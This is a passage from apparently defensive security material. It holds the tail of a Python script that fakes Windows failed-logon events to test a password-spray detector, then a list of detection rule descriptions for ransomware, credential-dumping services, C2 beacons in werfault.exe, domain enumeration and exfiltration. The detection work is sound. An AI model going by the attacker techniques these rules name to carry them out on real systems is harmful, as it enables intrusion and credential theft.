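        ev.append({"EventID": "4625", "Computer": "WS01", "IpAddress": "-", "LogonType": "2",
                   "AuthenticationPackageName": "Negotiate", "SubStatus": "0xC000006A",
                   "TargetUserName": f"user{i:02d}", "SubjectUserName": "bob",
                   "ProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"})
    return ev


if __name__ == "__main__":
    print(detect_spraying(constructed_auth_events()))
```

Splitting valid from invalid and disabled accounts matters for triage: a burst against non-existent names is usually a username-enumeration or wordlist run, while a burst of 0x18 / 0xC000006A against real accounts is a spray that may already have one hit, so the same window should also be searched for the matching 4624 / 4768 success.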
Suspicious Multiple File Rename Or Delete Occurred Detects multiple file rename or delete events occurring within a specified period of time by the same user (these events may indicate ransomware activity). https://www.manageengine.com/data-security/how-to/how-to-detect-ransomware-attacks.html
Possible Remote Password Change Through SAMR Detects a possible remote NTLM hash change through the SAMR API calls SamrChangePasswordUser() or SamrSetInformationUser(). "Audit User Account Management" under "Advanced Audit Policy Configuration" has to be enabled in your local security policy / GPO to see these events. None
Suspicious Werfault.exe Network Connection Outbound Adversaries can migrate Cobalt Strike/Metasploit/C2 beacons on compromised systems into the legitimate werfault.exe process to avoid detection. https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/
Failed Mounting of Hidden Share Detects repeated failed (outgoing) attempts to mount a hidden share https://twitter.com/moti_b/status/1032645458634653697, https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5
Rare Service Installations Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services None
Rare Scheduled Task Creations This rule detects rare scheduled task creations. Typically software gets installed on multiple systems, not only on a few. The aggregation and count function selects tasks with rare names. None
Domain User Enumeration Network Recon 01 Domain user and group enumeration via network reconnaissance, as seen in APT29 and other actors. Detects a set of RPC (remote procedure) calls used to enumerate a domain controller. The rule was created based on the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29 https://github.com/OTRF/detection-hackathon-apt29, https://github.com/OTRF/detection-hackathon-apt29/issues/37
Potential Exfiltration of Compressed Files This rule detects potential exfiltration by looking for a few compression extensions in the URI and signs of compression in the MIME type, file type, and HTTP body https://github.com/OTRF/detection-hackathon-apt29/issues/17